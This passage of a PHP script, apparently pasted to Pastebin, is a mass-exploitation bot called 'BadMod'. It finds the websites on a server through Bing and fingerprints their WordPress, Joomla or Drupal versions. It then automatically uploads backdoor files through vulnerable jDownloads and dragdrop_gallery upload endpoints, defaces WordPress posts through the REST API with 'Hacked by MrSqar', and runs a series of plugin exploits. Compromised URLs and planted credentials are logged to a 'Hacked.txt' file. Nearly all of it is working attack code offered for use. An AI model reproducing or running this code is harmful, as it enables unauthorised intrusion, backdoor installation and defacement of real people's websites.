  842.     if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  843. $result = fopen("result/Hacked.txt","a+"); 
  844. echo $red."  [add_user] ====> ".$green." Done !\n";
  845. fwrite($result,$url2." => username : badmod  => password : admin");
  846. fwrite($result,"\n");
  847. fclose($result);
  848.     } else {
  849. echo $red. "  [add_user] ====> ".$orange."Failed"." \n";
  850. }
  851.     }
  852.  
  853. function joom_down($url){
  854.      $file1='BackDoor/BadMod.zip';
  855.      $file2='BackDoor/BadMod.gif';
  856. if (function_exists('curl_file_create')) { // php 5.5+
  857.   $cFile1 = curl_file_create($file1);
  858. } else { //
  859.   $cFile1 = '@' . realpath($file1);
  860. }
  861. if (function_exists('curl_file_create')) { // php 5.5+
  862.   $cFile2 = curl_file_create($file2);
  863. } else { //
  864.   $cFile2 = '@' . realpath($file2);
  865. }
  866.      $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
  867.      $sco=($url).($bbb);
  868.         $post=array(
  869.     'name'=>'BadMod_MrSqar','mail'=>'mrsqar@gmail.com','catlist'=>'1','file_upload'=> $cFile1 ,'filetitle' =>"Hacked by MrSqar",
  870.     'description'=>"<p>Hacked</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
  871.     'send'=>1,'senden'=>"Send file", 'description'=>"<p>Owned</p>",
  872.     'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=> $cFile2
  873.     );
  874.         $ch = curl_init ($sco);
  875.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
  876.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  877.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
  878.         curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  879.         curl_setopt ($ch, CURLOPT_POST, TRUE);
  880.         curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  881.         $data = curl_exec ($ch);
  882.         curl_close ($ch);
  883.     $path='/images/jdownloads/screenshots/';
  884.     $TheEnd=($url).($path).($file2);
  885. $red    = "\e[91m";
  886. $green  = "\e[92m";
  887. $orange = "\e[38;5;208m";
  888.     if(preg_match("/color=\"green\">/",$data)){
  889. echo $red. "  [com_j-d] ====> ".$green."Done"." \n";
  890. $result = fopen("result/Hacked.txt","a+"); 
  891. fwrite($result,$TheEnd);
  892. fwrite($result,"\n");
  893.     }else{
  894. echo $red. "  [com_j-d] ====> ".$orange."Failed"." \n";
  895.     }
  896. }
  897.  
  898. function drupal_upload($target){
  899. $green  = "\e[92m";
  900. $red    = "\e[91m";
  901. $orange = "\e[38;5;208m";
  902. $uploadfile="mrsqar.gif";
  903. $uploadfile2="mrsqar.jpg";
  904. $ch = curl_init("$target/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
  905. curl_setopt($ch, CURLOPT_POST, true);  
  906. curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
  907.                                             'user_file[1]'=>"@$uploadfile2"));
  908. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  909. $postResult = curl_exec($ch);
  910. curl_close($ch);
  911. $ok = get_headers("$target/sites/all/modules/dragdrop_gallery/$uploadfile");
  912. if(preg_match("/404/",$ok[0])){
  913. echo $red. "  [upload] ====> ".$orange."Failed"." \n";
  914. }else{
  915. $result = fopen("result/Hacked.txt","a+"); 
  916. $ok = "$target/sites/all/modules/dragdrop_gallery/$uploadfile";
  917. echo $red."  [upload] ====> ".$green." Done !\n";
  918. fwrite($result,$ok);
  919. fwrite($result,"\n");
  920. fclose($result);
  921. }
  922. }
  923. function contents($target){
  924. $source = @file_get_contents("$target"."/wp-json/wp/v2/posts/");
  925. $exp = explode(",",$source);
  926. $black = array(
  927.         '{'  => '',
  928.         '"'  => '',
  929.         'id'  => '',
  930.         ':'  => '',
  931.         '['  => '',
  932.         ']'  => '',
  933. );
  934. $rb = @str_replace( array_keys( $black ), $black, $exp[0] );
  935. $content = "
  936.       HaCkEd bY MrSqAr HaCkEr
  937.       BadMod Yemeni bot v1.0      
  938. ";
  939. $file = "badmod.html";
  940. $id = $rb."justracccwdata";
  941. $target2 = $target."/wp-json/wp/v2/posts/1";
  942. $data = array("id" => $id,"title" => "Hacked by MrSqar !","slug" => $file , "content" => $content);                                                                    
  943. $data_string = json_encode($data);                                                                                  
  944. $ch = curl_init("$target2");                                                                      
  945. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");                                                                    
  946. curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);                                                                  
  947. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);                                                                      
  948. curl_setopt($ch, CURLOPT_HTTPHEADER, array(                                                                          
  949.     'Content-Type: application/json',                                                                                
  950.     'Content-Length: ' . strlen($data_string))                                                                      
  951. );                                                                                                                  
  952. $result = curl_exec($ch);
  953. //echo $result;
  954. $red    = "\e[91m";
  955. $green  = "\e[92m";
  956. $orange = "\e[38;5;208m";
  957. if(preg_match("/$file/",$result)){
  958. echo $red. "  [inject] -==============- ".$green."Done"." \n";
  959. $hacked = fopen("result/Hacked.txt","a+");
  960. $def = $target."/"."badmod.html";
  961. fwrite($hacked,$def);
  962. fwrite($hacked,"\n");
  963.     } else {       
  964. $red    = "\e[91m";
  965. $green  = "\e[92m";
  966. $orange = "\e[38;5;208m";
  967. echo $red. "  [inject] -==============- ".$orange."Failed"." \n";
  968. }
  969. }
  970. function bing($what) {
  971.     for ($i = 1;$i <= 300000;$i+= 10) {
  972.         $ch = curl_init();
  973.         curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=" . urlencode($what) . "&&first=" . $i . "&FORM=PERE");
  974.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  975.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  976.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd() . '/log.txt');
  977.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd() . '/log.txt');
  978.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  979.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  980.         $data = curl_exec($ch);
  981.         preg_match_all('#;a=(.*?)" h="#', $data, $links);
  982.         foreach ($links[1] as $link) {
  983.             $allLinks[] = $link;
  984.         }
  985.         if (!preg_match('#"sw_next"#', $data)) break;
  986.     }
  987.     if (!empty($allLinks) && is_array($allLinks)) {
  988.         return array_unique(array_map("urldecode", $allLinks));
  989.     }
  990. }
  991. function site($link) {
  992.     $parse = parse_url($link);
  993.     return $parse['scheme'] . "://" . $parse['host'];
  994. }
  995. function get_version($target){
  996. $OK = @get_headers("$target/readme.html");
  997. if(@preg_match("/OK/",$OK[0])){
  998. $source =  @file_get_contents("$target/readme.html");
  999. $black = array(
  1000.         '"' => '',
  1001.         '/'  => '',
  1002.         '<'  => '',
  1003.         '>'  => '',
  1004.         'li'  => '',
  1005.         'h1'  => '',
  1006.         'h2'  => '',
  1007.         'h3'  => '',
  1008.         'h4'  => '',
  1009.         'h5'  => '',
  1010.         'head'  => '',
  1011.         'title'  => '',
  1012.         'body'  => '',
  1013.         'html'  => '',
  1014.         'style'  => '',
  1015.         'href'  => '',
  1016.         '='  => '',
  1017.         'meta'  => '',
  1018.         'http'  => '',
  1019.         'https'  => '',
  1020.         ':'  => '',
  1021.         '//'  => '',
  1022.         'www'  => '',
  1023.         'com'  => '',
  1024.         'php'  => '',
  1025.         'DOCTYPE'  => '',
  1026.         '!'  => '',
  1027.         '<br />'  => '',
  1028.         'br'  => '',
  1029.         '/>'  => '',
  1030.         '<'  => '',
  1031. );
  1032. $ex = @explode("\n",$source);
  1033. $rb = @str_replace( array_keys( $black ), $black, $ex[11] );
  1034. $rb = @trim($rb);
  1035. echo $rb;
  1036. }else {
  1037.  
  1038. //  echo " Error this not wordpress !! "."\n";
  1039.         }
  1040.    
  1041.    
  1042. }
  1043.  
  1044. ###############################################
  1045. #//||||||||||||  Functions end  ||||||||||||\\#
  1046. ###############################################
  1047.  
  1048. start1 : echo $bold.$fgreen;
  1049. echo "\n   [1] By ip only \n";
  1050. echo "\n   [2] Ip generator \n";
  1051. echo "\n   [3] import sites from txt \n\n";
  1052. start2 : echo $white."   [(Exec)]>: ";
  1053. $chos = trim(fgets(STDIN,1024));
  1054. switch($chos){
  1055. ###################
  1056. #// option 1 go \\#
  1057. ###################
  1058.  case 1 :  
  1059. getIp : echo $fgreen."\n   [+] Enter server ip : ".$white;
  1060. $ip = fgets(STDIN,1024);
  1061. $ip = trim($ip);
  1062. if(empty($ip)){
  1063.  
  1064. echo "\n   [-] Error is empty !! \n";
  1065. goto getIp;    
  1066.    
  1067. }
  1068. if (preg_match("/www/",$ip)){
  1069.  
  1070. $ip = gethostbyname($ip);
  1071.  
  1072.     }elseif(preg_match("/http/",$ip)){
  1073.  
  1074. $ip = gethostbyname($ip);
  1075.  
  1076.     }
  1077. $sitesO = bing("ip:$ip \"=\"");
  1078. $sitesR = @array_map("site", $sitesO);
  1079. $sitesA = @array_unique($sitesR);
  1080. $done = @implode("\n", $sitesA) . "\n";
  1081. $sitesT = fopen("sites.txt","a+");
  1082. fwrite($sitesT,$done);
  1083. echo $yellow. "\n   [$] All server sites will saved in sites.txt , \n";
  1084.      break;
  1085. ####################
  1086. #// end option 1 //#
  1087. ####################
  1088.  
  1089.  
  1090. ###################
  1091. #// option 2 go \\#
  1092. ###################
  1093.  case 2 :
  1094. echo "\n";
  1095. echo $bold.$green."   [~] Enter number : ";
  1096. $ipG = trim(fgets(STDIN,1024));
  1097. echo $red."\n   Total ip address : ".$ipG."\n\n";  
  1098. for($i=0; $i<$ipG; $i++){
  1099. $ip1 = rand(40,255);
  1100. $ip2 = rand(40,255);
  1101. $ip3 = rand(40,255);
  1102. $ip4 = rand(40,255);
  1103. $rslt = $yellow.$ip1.".".$ip2.".".$ip3.".".$ip4;
  1104. echo $rslt;
  1105. echo "\n";
  1106.     }
  1107. echo $end;
  1108. goto start1;
  1109.  break;
  1110. ####################
  1111. #// end option 2 \\#
  1112. ####################
  1113.  
  1114. ###################
  1115. #// option 3 go \\#
  1116. ###################
  1117. case 3 :
  1118. echo "\n";
  1119. echo "   [+] Enter file name : ";
  1120. $txt = trim(fgets(STDIN,1024));
  1121. $sites = @file_get_contents("$txt") or die ("\n$red    Error file not found\n");
  1122. $exp = explode("\n",$sites);
  1123. $exp = array_unique($exp);
  1124. echo $orange.$end;
  1125. echo $green."                          [!] Total sites : ".$red.count($exp).$green." [!]\n";
  1126. foreach($exp AS $expl){
  1127. $result = fopen("result/Hacked.txt","a+");
  1128. $source = @file_get_contents("$expl"); 
  1129. //echo $source;
  1130. if(preg_match("/wp-content/",$source)){
  1131. $v = $expl;
  1132. $OK = @get_headers("$v/readme.html");
  1133. if(@preg_match("/OK/",$OK[0])){
  1134. $source =  @file_get_contents("$v/readme.html");
  1135. $black = array(
  1136.         '"' => '',
  1137.         '/'  => '',
  1138.         '<'  => '',
  1139.         '>'  => '',
  1140.         'li'  => '',
  1141.         'h1'  => '',
  1142.         'h2'  => '',
  1143.         'h3'  => '',
  1144.         'h4'  => '',
  1145.         'h5'  => '',
  1146.         'head'  => '',
  1147.         'title'  => '',
  1148.         'body'  => '',
  1149.         'html'  => '',
  1150.         'style'  => '',
  1151.         'href'  => '',
  1152.         '='  => '',
  1153.         'meta'  => '',
  1154.         'http'  => '',
  1155.         'https'  => '',
  1156.         ':'  => '',
  1157.         '//'  => '',
  1158.         'www'  => '',
  1159.         'com'  => '',
  1160.         'php'  => '',
  1161.         'DOCTYPE'  => '',
  1162.         '!'  => '',
  1163.         '<br />'  => '',
  1164.         'br'  => '',
  1165.         '/>'  => '',
  1166.         '<'  => '',
  1167.         'Version'  => '',
  1168.        
  1169. );
  1170. $ex = @explode("\n",$source);
  1171. $rb = @str_replace( array_keys( $black ), $black, $ex[11] );
  1172. $rb = @trim($rb);
  1173. }else{
  1174. $rb = " Unknown";  
  1175. }
  1176. if(!preg_match("/Version/",$rb)){
  1177. $rb = " Unknown";  
  1178. }
  1179. if($rb == " Unknown"){
  1180. $file = "$expl";
  1181. $searchfor = 'generator';
  1182. $contents = file_get_contents($file);
  1183. if(!preg_match("/Version/",$contents) OR !preg_match("/Espresso/",$contents) OR !preg_match("/Event/",$contents)){
  1184. $pattern = preg_quote($searchfor, '/');
  1185. $pattern = "/^.*$pattern.*\$/m";
  1186. if(preg_match_all($pattern, $contents, $matches)){
  1187. if(preg_match("/WordPress/",$matches[0][0])){
  1188. $arr = array(
  1189. '<' => "",
  1190. 'meta' => "",
  1191. 'name' => "",
  1192. '=' => "",
  1193. '"' => "",
  1194. 'content' => "",
  1195. 'generator' => "",
  1196. '/>' => "",
  1197. 'WordPress' => "",
  1198. ' ' => "",
  1199. 'a' => "",
  1200. 'A' => "",
  1201. 'b' => "",
  1202. 'B' => "",
  1203. 'c' => "",
  1204. 'C' => "",
  1205. 'd' => "",
  1206. 'D' => "",
  1207. 'e' => "",
  1208. 'E' => "",
  1209. 'f' => "",
  1210. 'F' => "",
  1211. 'g' => "",
  1212. 'G' => "",
  1213. 'h' => "",
  1214. 'H' => "",
  1215. 'i' => "",
  1216. 'I' => "",
  1217. 'j' => "",
  1218. 'J' => "",
  1219. 'k' => "",
  1220. 'K' => "",
  1221. 'l' => "",
  1222. 'L' => "",
  1223. 'm' => "",
  1224. 'M' => "",
  1225. 'n' => "",
  1226. 'N' => "",
  1227. 'o' => "",
  1228. 'O' => "",
  1229. 'p' => "",
  1230. 'P' => "",
  1231. 'q' => "",
  1232. 'Q' => "",
  1233. 'r' => "",
  1234. 'R' => "",
  1235. 's' => "",
  1236. 'S' => "",
  1237. 't' => "",
  1238. 'T' => "",
  1239. 'u' => "",
  1240. 'U' => "",
  1241. 'v' => "",
  1242. 'V' => "",
  1243. 'w' => "",
  1244. 'W' => "",
  1245. 'x' => "",
  1246. 'X' => "",
  1247. 'y' => "",
  1248. 'Y' => "",
  1249. 'z' => "",
  1250. 'Z' => "",
  1251. );
  1252. $rb = str_replace(array_keys($arr),$arr,$matches[0]);
  1253. $rb = $rb[0];
  1254. }
  1255. else{
  1256. $rb = " Unknown";
  1257. }
  1258. }else{
  1259. $rb = " Unknown";
  1260.  
  1261. }
  1262. }else{
  1263. $rb = " Unknown";
  1264.  
  1265. }
  1266. }
  1267. $vuln = "";
  1268. echo $blue."\n -========================================- "."\n";
  1269. echo $red. "  Target : ".$green.$expl."\n";
  1270. echo $red. "  [CMS] -=================- ".$green." WordPress \n";
  1271. if($rb !== " Unknown"){
  1272. $ver = "Version";  
  1273. }else{
  1274. $ver = ""; 
  1275. }
  1276. if(isset($wordpress["$rb"])){
  1277. $vulns = fopen("result/Vulns.txt","a+");
  1278. fwrite($vulns,"\n Target ");
  1279. fwrite($vulns," [$expl] \n");
  1280. fwrite($vulns,$wordpress["$rb"]);
  1281. fwrite($vulns,"\n -============================- \n");
  1282. fclose($vulns);
  1283. $rslt = "Saved ";
  1284. }else{
  1285. $rslt = $orange."Failed ";
  1286. }
  1287. echo $red. "  [Version] -=============- ".$green;
  1288. GetWpVer($expl);
  1289. echo "\n";
  1290. echo contents($expl);
  1291. echo wp_upload($expl);
  1292. echo wp_rightnow($expl);
  1293. echo wp_dreamwork($expl);
  1294. echo wp_jquery($expl);
  1295. echo wp_ads($expl);
  1296. echo wp_formcraft($expl);
  1297. echo wp_blocker($expl);
  1298. echo wp_blazeS($expl);
  1299. echo wp_upload2($expl);
  1300. echo wp_jbm($expl);
  1301. echo wp_bsn($expl);
  1302. echo wp_qual($expl);
  1303. echo plupload($expl);
  1304. echo $red."  [Vulns] -===============- ".$green.$rslt."\n";
  1305. echo $blue."\n -========================================- "."\n";
  1306.  
  1307. }
  1308. elseif(preg_match("/option=/",$source) OR preg_match("/index.php?option/",$source) OR preg_match("/Joomla/",$source) ){
  1309. echo $blue."\n -========================================- "."\n";
  1310. echo $red. "  Target : ".$green.$expl."\n";
  1311. echo $red. "  [CMS] -========- ".$green." joomla \n";
  1312. echo joom_ver($expl);
  1313. echo joom_down($expl);
  1314. echo com_fabrik($expl);
  1315. echo $blue."\n -========================================- "."\n";
  1316. }elseif(preg_match("/node/",$source)){
  1317. echo $blue."\n -========================================- "."\n";
  1318. echo $red. "  Target : ".$green.$expl."\n";
  1319. echo $red. "  [CMS] ====> ".$green." drupal \n";
  1320. echo drupal_upload($expl);
  1321. echo add_user($expl);
  1322. echo $blue."\n -========================================- "."\n";
  1323.     }
  1324. }
  1325. break;
  1326. ####################
  1327. #// end option 3 \\#
  1328. ####################
  1329.  
  1330. ###################
  1331. #//  default go \\#
  1332. ###################
  1333. default :
  1334. echo $red."   [-] invild choice \n";   
  1335. goto start2;
  1336. ##################
  1337. #// end switch \\#
  1338. ##################
  1339.  
  1340. }
  1341.  
  1342. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top